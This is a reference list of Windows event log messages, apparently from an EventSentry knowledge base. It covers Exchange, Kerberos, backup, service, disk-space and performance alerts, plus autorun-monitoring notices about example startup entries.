Event ID:
Source:
MSExchangeIS
Message:
Unable to initialize the Microsoft Exchange Information Store service. - Error 0x80004005.


Event ID:
Source:
EventSentry
Category:
TestCategory
Message:
Congratulations! You have just installed and setup up EventSentry (on host TEST3-W2K), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.


Event ID:
Source:
MSExchangeIS
Message:
Error 0x80004005 connecting to the Microsoft Active Directory


Event ID:
Source:
Security
Message:
Successful Logon:
User Name: <user name>
Domain: <domain name>
Logon ID: <logon identifier>
Logon Type: <logon type>
Logon Process: <logon process>
Authentication Package: <package name>
Workstation Name: <computer name>


Event ID:
Source:
Outlook
Message:
Connection to the Microsoft Exchange Server has been restored


Event ID:
Source:
Application Error
Message:
Faulting application test.exe, version 1.00.0.400, faulting module test.exe, version 1.00.0.400, fault address 0x00031112.


Event ID:
Source:
Security
Message:
A new process has been created:
New Process ID: 860
Image File Name: calc.exe
Creator Process ID: 3492
User Name: MyUser
Domain: NETIKUS
Logon ID: (0x0,0x87F44D2)


Event ID:
Source:
crypt32
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.


Event ID:
Source:
Tcpip
Message:
TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts.


Event ID:
Source:
MsiInstaller
Message:
Failed to connect to server


Event ID:
Source:
NTBackup
Message:
The 'ESE API' returned 'Unable to perform the operation. Either you can not connect to the specified server
or the service you are trying to connect to is not running.
' from a call to 'HrESEBackupRestoreNodes()' additional data ''


Event ID:
Source:
Netlogon
Message:
The session setup from the computer ComputerName failed to authenticate. The name of the account referenced in the security database is AccountName$.
The following error occurred:
Access is denied.


Event ID:
Source:
MSSQLSERVER
Message:
3041 :
BACKUP failed to complete the command BACKUP LOG [DATABASE] TO DISK = N'E:\Microsoft SQL Server\MSSQL\BACKUP\DatabaseLog.backup' WITH INIT , NOUNLOAD , NAME = N'Database Transaction Log Backup', NOSKIP , STATS = 10, NOFORMAT


Event ID:
Source:
EventLog
Message:
Microsoft (R) Windows (R) 5.02. 3790 Multiprocessor Free.


Event ID:
Source:
EventLog
Message:
The system uptime is 10045 seconds.


Event ID:
Source:
atapi
Message:
The device, \Device\ScsiPort0, did not respond within the timeout period.


Event ID:
Source:
atapi
Message:
The driver detected a controller error on Device\ScsiPort0.


Event ID:
Source:
atapi
Message:
A parity error was detected on [device name].


Event ID:
Source:
Blue Screen Trap
Message:
The firmware update, Version 4.09 P29-09/15/2004, contains critical bug fixes and is the minimum version required. Please perform the update at your earliest convenience. Click on the underlined Version to view more details on the fixes.

Fixes

ProLiant DL380 G3 ROM P29 (09/15/2004)
Updated to integrate the latest Intel processor support code into the System ROM. This works around an issue with the Intel Xeon processor that could cause unexpected behavior or system hang.


Event ID:
Source:
Internet Explorer
Message:
The '..' characters are not allowed in the Path parameter for the MapPath method


Event ID:
Source:
EventSentry
Message:
The event description will show any message received through the syslog protocol


Event ID:
Source:
E100B
Message:
Adapter Intel(R) PRO/100 VE Network Connection: Did not receive auto-negotiation advertisement from link partner. A full duplex connection may be available.


Event ID:
Source:
RemoteAccess
Message:
The user xxx\xxx failed an authentication attempt due to the following reason: The user could not be authenticated using Challenge Handshake Authentication Protocol (CHAP). A reversibly encrypted password does not exist for this user account. To ensure that reversibly encrypted passwords are enabled, check either the domain password policy or the password settings on the user account.

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
Kerberos
Message:
The kerberos subsystem encountered a PAC verification failure. This indicates that the PAC from the client computername$ in realm DOMAIN.LOCAL had a PAC which failed to verify or was modified. Contact your system administrator.


Event ID:
Source:
Kerberos
Message:
The kerberos subsystem is having problems fetching tickets from your domain controller using the UDP network protocol. This is typically due to network problems. Please contact your system administrator.


Event ID:
Source:
Internet Explorer
Message:
/projectserver/Library/pjquery.asp, line 658


Event ID:
Source:
Application Management
Message:
MSI Error - 2755 -

Failed to apply changes to software installation settings. Software changes could not be applied. A previous log entry with details should exist. The error was : The Temp folder is on a drive that is full or is inaccessible. Free up space on the drive or verify that you have write permission on the Temp folder.


Event ID:
Source:
TermDD
Message:
The RDP protocol component "DATA ENCRYPTION" detected an error in the protocol stream and has disconnected the client.


Event ID:
Source:
OMA Windows 2003
Message:
An unknown error occurred while processing the current request: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.

Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

Inner Error: Exception has been thrown by the target of an invocation.

Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)

Inner Error: The remote server returned an error: (403) Forbidden.

Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
MSSQL$BKUPEXEC
Message:
18272 :

I/O error on backup or restore restart-checkpoint file 'C:\Program Files\Microsoft SQL Server\MSSQL$BKUPEXEC\backup\model4IDR.ckp'. Operating system error 3(error not found). The statement is proceeding but is non-restartable.


Event ID:
Source:
MSExchangeSA
Message:
Referral Interface cannot contact any Global Catalog that supports the NSPI Service. Clients making RFR requests will fail to connect until a Global Catalog becomes available again. After a Domain Controller is promoted to a Global Catalog, it must be rebooted to support MAPI Clients.


Event ID:
Source:
Message:
When performing a RSOP to a remote computer you get: You do not have permission to perform this operation. Access is denied.


Event ID:
Source:
Microsoft Operations Manager
Message:
The MOM Server failed to install agent on remote computer xxxx-cb00.xxxx.local.

Error Code: -2147024891

Error Description: Access is denied.

Microsoft Installer Error Description: No Description Available


Event ID:
Source:
MOM Operator Console
Message:
The response processor failed to execute a response. The response returned the error message: The remote procedure call failed.

Response Details:

Rule ID: {xxx-xxx-xx-x-x-x-x-x}
Response description: script: bla
Time of Last Event: 1/14/2005 8:32:42 AM
Time Raised: 1/14/2005 8:32:33 AM
Rule Name: The rule response failed to execute
Modified By: NT AUTHORITY\NETWORK SERVICE


Event ID:
Source:
Userenv
Message:
Windows cannot access the file gpt.ini for GPO CN=31B2F340-016D-11D2-945F-00C04FB984F9,CN=Policies,CN=System,DC=xxxx,DC=local. The file must be present at the location <\\xxxx.local\sysvol\xxxx.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\gpt.ini>. (Configuration information could not be read from the domain controller, either because the machine is unavailable, or access has been denied. ). Group Policy processing aborted.


Event ID:
Source:
MSExchangeOMA
Message:
An unknown error occurred while processing the current request:
Message: The remote server returned an error: (403) Forbidden.
Source: Microsoft.Exchange.OMA.ExchangeDataProvider
Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)

Message: Exception has been thrown by the target of an invocation.
Source: mscorlib
Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)

Message: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.
EventMessage:
UserMessage: A System error has occurred while processing your request. Please try again. If the problem persists, contact your administrator.
Source: Microsoft.Exchange.OMA.UserInterface
Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.RaiseOnStart(EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)


Event ID:
Source:
NTBackup
Message:
The 'Active Directory' returned 'A disk I/O error occurred.
' from a call to 'BackupTruncateLogs()' additional data '-'.


Event ID:
Source:
SQLSERVERAGENT
Message:
The data portion of event 19002 from MSSQLSERVER is invalid.


Event ID:
Source:
PureMessage
Message:
Spam rules update error (CopyFile, dwError = 32) (Error code 0x80041F04) occurred.


Event ID:
Source:
NtFrs
Message:
Event Type: Warning
Event Source: NtFrs
Event Category: None
Event ID: 13565
Date: 10.03.2005
Time: 18:09:24
User: N/A
Computer: xxxx
Description:
File Replication Service is initializing the system volume with data from another domain controller. Computer XXXX-CB01 cannot become a domain controller until this process is complete. The system volume will then be shared as SYSVOL.

To check for the SYSVOL share, at the command prompt, type:
net share

When File Replication Service completes the initialization process, the SYSVOL share will appear.

The initialization of the system volume can take some time. The time is dependent on the amount of data in the system volume, the availability of other domain controllers, and the replication interval between domain controllers.


Event ID:
Source:
PerfLib
Message:
The data buffer created for the "MSExchangeIS" service in the "C:\Program Files\Exchsrvr\bin\mdbperf.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.


Event ID:
Source:
Service Control Manager
Message:
The Microsoft Exchange Routing Engine service failed to start due to the following error:
The executable program that this service is configured to run in does not implement the service.


Event ID:
Source:
DCOM
Message:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
0C0A3666-30C9-11D0-8F20-00805F2CD064
to the user BULL\IWAM_BULL SID (BULL\IWAM_BULL). This security permission can be modified using the Component Services administrative tool.


Event ID:
Source:
Service Control Manager
Message:
The Microsoft Exchange Information Store service terminated with service-specific error 0 (0x0).


Event ID:
Source:
LSASRV
Message:
The Security System could not establish a secured connection with the server DNS/lyra.u.arizona.edu. No authentication protocol was available


Event ID:
Source:
WLBS
Message:
WLBS : host 1 does not have the same number or type of port rules as this host. Please check WLBS Setup dialog on all machines that belong to the cluster and make sure that they all contain the same number and the same type of port rules.


Event ID:
Source:
EventSentry
Message:
The status for service HTTPFilter (HTTP SSL) changed from Stopped to Running.


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to enroll for one Enrollment Agent (Computer) certificate (0x80094012). The permissions on the certificate template do not allow the current user to enroll for this type of certificate.


Event ID:
Source:
MSExchangeTransport
Message:

Event ID:
Source:
MSExchangeTransport
Message:
The categorizer is unable to categorize messages due to a retryable error.


Event ID:
Source:
Security
Message:
Logon Failure:
Reason: The user has not been granted the requested
logon type at this machine
User Name: %1
Domain: %2
Logon Type: %3
Logon Process: %4
Authentication Package: %5
Workstation Name: %6


Event ID:
Source:
DHCP
Message:
The IP address lease %1 for the Network Card with network address %2 has been denied by the DHCP server %3 (The DHCP Server sent a DHCPNACK message).


Event ID:
Source:
Winlogon
Message:
The shell stopped unexpectedly and %1 was restarted.


Event ID:
Source:
Service Control Manager
Message:
The PfModNT service failed to start due to the following error:
The system cannot find the file specified.


Event ID:
Source:
Print
Message:
Printer Canon Bubble-Jet BJC-85 (from RACOON) is pending deletion.


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to query the local audit policy settings. A call to open the LSA policy failed with error Access is denied.. Please see the EventSentry documentation for troubleshooting advice on this problem.


Event ID:
Source:
Security
Message:
The Windows Firewall has detected an application listening for incoming traffic.

Name: -
Path: C:\WINDOWS\system32\svchost.exe
Process identifier: 1160
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 68
Allowed: No
User notified: No


Event ID:
Source:
MSExchangeSA
Message:

Event ID:
Source:
MRxSmb
Message:
{Delayed Write Failed} Windows was unable to save all the data for the file \Device\LanmanRedirector. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.


Event ID:
Source:
EM Library
Message:
The "\\SERVER\SophosSBE\" library update task has failed. INDEX 0x8000ffff
Update failed. Parent could not be accessed. Check the parent address/path and access settings. INDEX 0x8000ffff
Could not read the EM Library database. MCID 0x80040403
Could not open requested resource "/update/index/00000000.db". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Failed to make a connection. VFS 0x80040407
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Could not open requested resource "/update/index/db.inf". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.


Event ID:
Source:
Service Control Manager
Message:
The ServiceABC service terminated unexpectedly. It has done this 3 time(s). The following corrective action will be taken in 0 milliseconds: No action.


Event ID:
Source:
KDC
Message:
The Security Account Manager failed a KDC request in an unexpected way. The error is in the data field. The account name was username@MYDOMAIN.LOCAL and lookup type 0x28.


Event ID:
Source:
Message:
An error occurred during a scheduled backup of drive I:\.
Error EA39070A: The internal structure of the PQI file is invalid or unsupported.
Details: 0xEA39070A
Source: Norton Ghost 9.0


Event ID:
Source:
Active Server Pages
Message:
Error: The Template Persistent Cache initialization failed for Application Pool 'DefaultAppPool' because of the following error: Could not create a Disk Cache Sub-directory for the Application Pool. The data may have additional error codes..


Event ID:
Source:
Norton Antivirus
Message:
An infected file has been found.


Event ID:
Source:
NTBackup
Message:
Begin Backup of SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal


Event ID:
Source:
NTBackup
Message:
End Backup of 'SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host email.company.com due to error 'Unable to establish TCP connection (10065). If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.


Event ID:
Source:
EventSentry
Message:
The process notification (target) "My Process" successfully executed the process "c:\batch\backup.cmd".


Event ID:
Source:
EventSentry
Message:
The process notification (target) "MyProcess" was unable to execute the process "c:\batch\mybatchfile.cmd" due to error 5.


Event ID:
Source:
EventSentry
Message:
User DOMAIN\User has successfully connected to host REMOTE from host LOCAL with the EventSentry management application.


Event ID:
Source:
EventSentry
Message:
When monitoring the Application event log, the EventSentry agent missed events between number 980 to 984. EventSentry will attempt to read those events at a later time to make sure that all events from the Application log are being processed.


Event ID:
Source:
EventSentry
Message:
The EventSentry agent has successfully adjusted the permissions of the configuration registry key HKLM\Software\netikus.net\EventSentry. 3 ACE entries (one of the following: Users, Power Users, Everyone) were removed to increase security.


Event ID:
Source:
W32Time
Message:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.


Event ID:
Source:
Browser
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-............ The data is the error code.


Event ID:
Source:
LicenseService
Message:
Replication of license information failed because the License Logging Service on server <Server> could not be contacted.


Event ID:
Source:
NETLOGON
Message:
No Windows NT or Windows 2000 Domain Controller is available for domain Domain. The following error occurred:

There are currently no logon servers available to service the logon request.


Event ID:
Source:
SQLSERVERAGENT
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).


Event ID:
Source:
EventSentry
Message:
The EventSentry service could not start because of a configuration error. Please make sure that you have at least one filter and target or the syslog daemon configured.


Event ID:
Source:
EventSentry
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3.


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.


Event ID:
Source:
EventSentry
Message:
Unable to open parallel port LPTx. Please make sure that no application is currently using this printer port, also make sure that no printer is using port LPTx. You might have to restart the service after the resource conflict is solved.


Event ID:
Source:
EventSentry
Message:
Unable to start service because no valid license was found.


Event ID:
Source:
EventSentry
Message:
The configuration for the agent (service) was successfully re-read from the registry.


Event ID:
Source:
EventSentry
Message:
The custom event log MyCustomLog is not configured on this system. You will not be able to monitor this event log on this system. The service (agent) will continue to run without interruption.


Event ID:
Source:
EventSentry
Message:
The temporary file %1 has been found but no filter referencing this target (%2) is configured for a summary notification. The file has been deleted.


Event ID:
Source:
EventSentry
Message:
The following service was added: UtilMan (Utility Manager). Current service state is Stopped, service is using binary file C:\WINNT\System32\UtilMan.exe.


Event ID:
Source:
LicenseService
Message:
Replication of license information failed because the License Logging Service on server <PDC servername> could not be contacted.


Event ID:
Source:
EventSentry
Message:
The following x service(s) are configured to AUTOSTART but are currently not running:
Cdaudio
Changer
CD-Burning Filter Driver
lbrtfdc
mrtRate
PCIDump
Sfloppy
Security Center


Event ID:
Source:
MsiInstaller
Message:
Product: J2SE Runtime Environment 5.0 Update 4 -- Installation failed.


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted.
Enrollment will not be performed.


Event ID:
Source:
MSExchangeIS Public Store
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.


Event ID:
Source:
IMAP4SVC
Message:
DS lookup for user [USERNAME], connecting from 10.10.10.1, failed with error 0x80040920.


Event ID:
Source:
IMAP4SVC
Message:
Authentication attempt from 10.10.10.1 to [USERNAME] has failed with error 0x52e.


Event ID:
Source:
EvntAgnt
Message:
Error reading log event record. Handle specified is %d. Return code from ReadEventLog is 122.


Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Job Failed(Server:


Event ID:
Source:
EventSentry
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.


Event ID:
Source:
Security
Message:
Object Open: Object Server: SC Manager Object Type: SERVICE OBJECT Object Name: RemoteAccess New Handle ID: - Operation ID: {0,840128961} Process ID: 416 Primary User Name: CLMTS001$ Primary Domain: ATSC Primary Logon ID: (0x0,0x3E7) Client User Name: e010421 Client Domain: ATSC Client Logon ID: (0x0,0x32125658) Accesses Query status of service Privileges -


Event ID:
Source:
MsiInstaller
Message:
Failed to connect to server. Error: 0x800401F0


Event ID:
Source:
Ftdisk
Message:
The system failed to flush data to the transaction log. Corruption may occur.


Event ID:
Source:
iScsiPrt
Message:
Failed to setup initiator portal. Error status is given in the dump data.


Event ID:
Source:
ESENT
Message:
wuaueng.dll (620) SUS20ClientDataStore: A request to write to the file


Event ID:
Source:
MegaServ.Log
Message:
Adapter 1: Battery Voltage LOW.


Event ID:
Source:
Application Management
Message:
The assignment of application Command AntiVirus for Windows Enterprise from policy Command AV failed. The error was: The group policy framework should call the extension in the synchronous foreground policy refresh.


Event ID:
Source:
Application Management
Message:
The install of application "application name" from policy "policy name" failed. The error was : The installation source for this product is not available. Verify that the source exists and that you can access it.


Event ID:
Source:
MSExchangeIS
Message:
Unexpected error 0x8004010f occurred in


Event ID:
Source:
NTDS Replication
Message:
Active Directory attempted to perform a remote procedure call (RPC) to the following server. The call timed out and was cancelled.

Server:
6d0f4d18-521c-4429-8d8e-06faf22b4f57._msdcs.ds.han.xx
Call Timeout (Mins):
5
Thread ID:
fcc

Additional Data
Internal ID:
5001047


Event ID:
Source:
PerfDisk
Message:
Unable to read the disk performance information from the system. Disk performance counters must be enabled for at least one physical disk or logical volume in order for these counters to appear. Disk performance counters can be enabled by using the Hardware Device Manager property pages. Status code returned is data DWORD 0.


Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Tape Alert Warning
(Server: "FILE") (Job: "Company - Differential Slot 6") Warning - Library security has been compromised.
Robotic Library for Device: DELL 3


Event ID:
Source:
Security
Message:
Backup of data protection master key.
Key Identifier: ab7287ab-974d-4dc7-aaaa-91e0bc96642e
Recovery Server:
Recovery Key ID:
Failure Reason: 0x3A


Event ID:
Source:
Security
Message:
Object Open: Object Server: Security Object Type: File Object Name: \Device\NetbiosSmb Handle ID: - Operation ID: {0,1502291133} Process ID: 1144 Image File Name: C:\WINDOWS\system32\svchost.exe Primary User Name: LOCAL SERVICE Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E5) Client User Name: - Client Domain: - Client Logon ID: - Accesses: SYNCHRONIZE ReadData (or ListDirectory) WriteData (or AddFile) Privileges: - Restricted Sid Count: 0 Access Mask: 0x100003


Event ID:
Source:
EventSentry
Message:
The status for service WmiApSrv (WMI Performance Adapter) changed from Running to Stopped.


Event ID:
Source:
Userenv
Message:
Kan het registerbestand niet verwijderen. Als u een zwervend profiel hebt, worden uw instellingen niet gerepliceerd. Neem contact op met de systeembeheerder.
Details: Toegang geweigerd. , buildnummer ((2195)).


Event ID:
Source:
Navisphere Agent
Message:
Time Stamp 12/31/05 18:59:05 Event Number 908 Severity Error Host CX300_SPB Storage Array APM00050506804 SPB Device SP B Description Fault - Cache Disabling


Event ID:
Source:
EventSentry
Message:
The service mouhid (Mouse HID Driver) is now being monitored. Current service status is Running.


Event ID:
Source:
EventSentry
Message:
The following service was added: APC UPS Service (APC UPS Service). Current service state is Running, service is using binary file C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe.


Event ID:
Source:
EventSentry
Message:
The following service was removed: APC UPS Service (APC UPS Service). Last service state was Running.


Event ID:
Source:
EventSentry
Message:
The service Abiosdsk (Abiosdsk) will not be monitored anymore. Last service status was Stopped.


Event ID:
Source:
EventSentry
Message:
"c:\batch\db_upd.cmd" was run for 381 seconds with the result shown below. Return Code was 0.
Downloading file ...
Dropping existing tables ...
Decompressing download file ...
Importing SQL data ...
Done.


Event ID:
Source:
EventSentry
Message:
The process "c:\batch\update.cmd" could not be created due to the following error:
The system cannot find the path specified.


Event ID:
Source:
EventSentry
Message:
The process superdel.exe exceeded the maximum allowed time interval of 15 minute(s). EventSentry was unable to terminate the process due to the following error: Acess Denied.


Event ID:
Source:
EventSentry
Message:
The process C:\temp\vnc-4_1_1-x86_win32.exe exceeded the maximum allowed time interval of 1 minute(s). The process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).


Event ID:
Source:
EventSentry
Message:
The Application event log was successfully cleared.


Event ID:
Source:
EventSentry
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\Windows\evilvirus.exe) registered itself in the directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The Application event log was successfully backed up to file C:\EVENTLOG BACKUP\APPLICATION_ 2005_08_18.EVT.


Event ID:
Source:
EventSentry
Message:
The Security event log was successfully cleared and backed up to file V:\CENTRAL EVENT LOG BACKUP\WHALE_SECURITY_08022006_1400.EVT.


Event ID:
Source:
EventSentry
Message:
The Security event log could not be cleared due to the following error: Access is Denied.


Event ID:
Source:
EventSentry
Message:
The Application event log could not be backed up to file C:\BACKUP\ESLOG\BULL_09022006.EVT due to the following error:
Cannot create a file when that file already exists.


Event ID:
Source:
EventSentry
Message:
The System event log could not be cleared and backed up due to the following error: Access is Denied.


Event ID:
Source:
EventSentry
Message:
Full event logs cannot be detected on this machine, this feature is not supported on this platform (only Windows 2000 or higher).


Event ID:
Source:
EventSentry
Message:
The process explorer.exe (PID 828) seems to be leaking "Working Set" memory. If you keep seeing this message in the event log then it is recommended that you monitor the memory consumption of this process closely with performance monitor if you have not already done so.
The process is currently using 5738496 bytes of "Working Set" memory, system memory load is 87%.
If you are certain that this process is not leaking memory then you can exclude this process from being monitored or change the monitoring parameters (contact support@netikus.net for more information) in the registry. If this process is leaking memory then contact the manufacturer of the application for support.



Event ID:
Source:
EventSentry
Message:
The process eventsentry_gui.exe is not active.


Event ID:
Source:
EventSentry
Message:
Free disk space for drive V:\ is below the configured limit of 4 percent. 3.31 percent of disk space (985 Mb) are currently available on drive V:\.


Event ID:
Source:
EventSentry
Message:
Free disk space for drive C:\ is below the configured limit of 500 Mb. 152 Mb of disk space are currently available on drive C:\.


Event ID:
Source:
EventSentry
Message:
Application NTToolkit was installed.
Additional Information:
Publisher: NETIKUS.NET ltd
Installation Directory: C:\Program Files\NTToolkit
Version: 1.91


Event ID:
Source:
EventSentry
Message:
Application NToolkit (NTToolkit) was uninstalled.


Event ID:
Source:
EventSentry
Message:
Application QuickTime Task ("C:\Program Files (x86)\QuickTime\qttask.exe" -atboottime) registered itself in the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The registry value AppInit_DLLs in key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows changed from "" to "wbsys.dll". All files specified in this value will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The application eraseallfiles.exe registered itself in the directory c:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\windows\evilvirus.exe) was removed from directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will no longer run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
Application YourPersonalAdware.exe was added to the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will be automatically run when the system boots.


Event ID:
Source:
EventSentry
Message:
Application YourPersonalAdware.exe was removed from the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will no longer be run when the system boots.


Event ID:
Source:
EventSentry
Message:
The application >26923b43-4d38-484f-9b9e-de460746276c registered file %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE in registry key SOFTWARE\Microsoft\Active Setup\Installed Components and might be automatically run when a user logs into the system. Please see the help file (search for ACTIVE SETUP) for more information.



Event ID:
Source:
Kerberos
Message:
There were password errors using the Credential Manager. To remedy, launch the Stored User Names and Passwords control panel applet, and reenter the password for the credential DOMAIN\myadmin.


Event ID:
Source:
EventSentry
Message:
Application >60B49E34-C7CC-11D0-8953-00A0C90347FF (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.


Event ID:
Source:
EventSentry
Message:
There was an error (999) monitoring registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. Please restart the EventSentry agent or notify NETIKUS.NET support if this problem persists. Autorun monitoring will NOT continue.


Event ID:
Source:
vmauthd
Message:
VMware process did not start properly.


Event ID:
Source:
EventSentry
Message:
The explorer extension DLL SecretMalwareDLL (using file ieatfiles.dll) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify and will no longer be loaded into explorer.exe.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Memory\Available MBytes" fell below the threshold of 10, the current average is 9.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") fell below the threshold of %3, the current average is %4.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" equals the threshold of %2.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\Thread Count" (instance "myapp") equals the threshold of 20.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "%1" exceeded the threshold of %2, the current average is %3.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter %1 (instance %2) exceeded the threshold of %3, the current average is %4.


Event ID:
Source:
EventSentry
Message:
